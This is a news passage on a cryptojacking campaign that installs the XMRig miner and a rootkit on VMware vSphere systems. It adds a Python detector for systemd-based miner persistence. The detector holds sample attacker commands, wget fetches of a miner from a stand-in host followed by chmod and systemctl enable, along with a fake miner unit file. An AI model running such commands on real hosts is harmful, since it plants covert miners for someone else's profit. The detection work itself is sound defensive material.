reports that researchers have discovered ongoing attacks on enterprises running virtual networks on VMware's vSphere container-based environment, which the attackers have injected with the open-source XMRig Monero cryptominer.
Threat actors have been observed modifying vSphere virtual networks using malicious shell scripts to allow them to run the cryptomining software undetected, said Siddharth Sharma of Uptycs.
“In this campaign, as we saw, the attackers tried to register the XMRig miner itself as a service (daemon), which runs whenever the system gets rebooted,” Sharma said.
“The shell script also contains commands which download the miner, the config file and the user-mode rootkit from the attacker’s web server. The attackers used [the] wget utility to fetch the malicious components and [the] chmod utility to make the components executable,” according to the report.
The script reloads the service once the cryptominer has been dropped, allowing the miner to activate. The attacker’s wallet had received 8.942 XMR, valued at around $1,790, as of the report’s publication.
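The persistence chain described above (fetch the components with wget, make them executable with chmod, register the miner as a systemd service, reload so it starts) is something a responder can check for directly on a Linux host. The Python below is an added example written for this article; it is not code from Uptycs, from the report, or from the attackers' script. The unit file, file paths, URLs and shell commands in it are constructed samples, and the temp-directory and binary-name heuristics are the author's assumptions about what such a drop typically looks like, not indicators taken from the report.

```python
"""Flag the drop-script persistence chain: wget -> chmod +x -> systemd unit -> reload.

All sample data below is constructed for illustration; the heuristics are assumptions.
"""
import re

# Assumption: miner drops commonly execute from world-writable scratch directories.
SUSPICIOUS_EXEC_DIRS = ("/tmp/", "/dev/shm/", "/var/tmp/")
# Assumption: the binary keeps a recognisable name (the article names XMRig).
KNOWN_MINER_NAMES = ("xmrig",)

# Constructed sample: a unit of the kind a drop script might write so the miner
# restarts on every reboot (the article says the miner was registered as a daemon).
SAMPLE_UNIT = """[Unit]
Description=system update service
After=network.target

[Service]
ExecStart=/tmp/.x/xmrig -c /tmp/.x/config.json
Restart=always

[Install]
WantedBy=multi-user.target
"""

# Constructed sample of a legitimate unit, to show the checks stay quiet on it.
BENIGN_UNIT = """[Unit]
Description=nginx

[Service]
ExecStart=/usr/sbin/nginx -g 'daemon off;'
Restart=always

[Install]
WantedBy=multi-user.target
"""

# Constructed sample of commands as they might appear in a recovered drop script.
SAMPLE_COMMANDS = [
    "wget http://example.invalid/xmrig -O /tmp/.x/xmrig",
    "wget http://example.invalid/config.json -O /tmp/.x/config.json",
    "chmod +x /tmp/.x/xmrig",
    "cp /tmp/.x/update.service /etc/systemd/system/update.service",
    "systemctl daemon-reload",
    "systemctl enable --now update.service",
]

# One regex per stage of the chain the article describes.
STAGE_PATTERNS = {
    "download": re.compile(r"^\s*(?:wget|curl)\b"),
    "make_executable": re.compile(r"^\s*chmod\s+(?:[ugoa]*\+x|[0-7]{3,4})\b"),
    "register_service": re.compile(r"/etc/systemd/system/|systemctl\s+enable\b"),
    "reload": re.compile(r"systemctl\s+daemon-reload\b"),
}
FULL_CHAIN = set(STAGE_PATTERNS)


def parse_unit(unit_text):
    """Minimal INI-style parser for a systemd unit: {section: {key: [values]}}."""
    sections, current = {}, None
    for raw in unit_text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("#", ";")):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections.setdefault(current, {})
            continue
        if current is None or "=" not in line:
            continue
        key, value = (part.strip() for part in line.split("=", 1))
        sections[current].setdefault(key, []).append(value)
    return sections


def unit_findings(unit_text):
    """Reasons a systemd unit looks like miner persistence (empty list if none)."""
    findings = []
    service = parse_unit(unit_text).get("Service", {})
    for exec_line in service.get("ExecStart", []):
        tokens = exec_line.split()
        if not tokens:
            continue
        # systemd allows prefix characters such as '-' or '@' before the binary path.
        binary = tokens[0].lstrip("-@+!:")
        if binary.startswith(SUSPICIOUS_EXEC_DIRS):
            findings.append(f"ExecStart binary in world-writable directory: {binary}")
        if any(name in binary.lower() for name in KNOWN_MINER_NAMES):
            findings.append(f"ExecStart binary name matches known miner: {binary}")
    if findings and service.get("Restart", ["no"])[0] == "always":
        findings.append("Restart=always keeps the suspicious binary running")
    return findings


def chain_stages(commands):
    """Return the set of chain stages present in a list of shell command lines."""
    return {stage for cmd in commands for stage, pat in STAGE_PATTERNS.items() if pat.search(cmd)}


def assess(unit_text, commands):
    """Combine unit-file and command-chain checks into one verdict."""
    stages = chain_stages(commands)
    return {
        "unit_findings": unit_findings(unit_text),
        "stages": sorted(stages),
        "full_chain": FULL_CHAIN <= stages,
    }


if __name__ == "__main__":
    print(assess(SAMPLE_UNIT, SAMPLE_COMMANDS))
    print(assess(BENIGN_UNIT, ["systemctl restart nginx"]))
```

On a live host the same checks would be fed the contents of /etc/systemd/system/*.service and whatever command history or script the responder recovered; a unit that both executes from a scratch directory and is set to Restart=always is worth pulling apart even when the binary name has been changed.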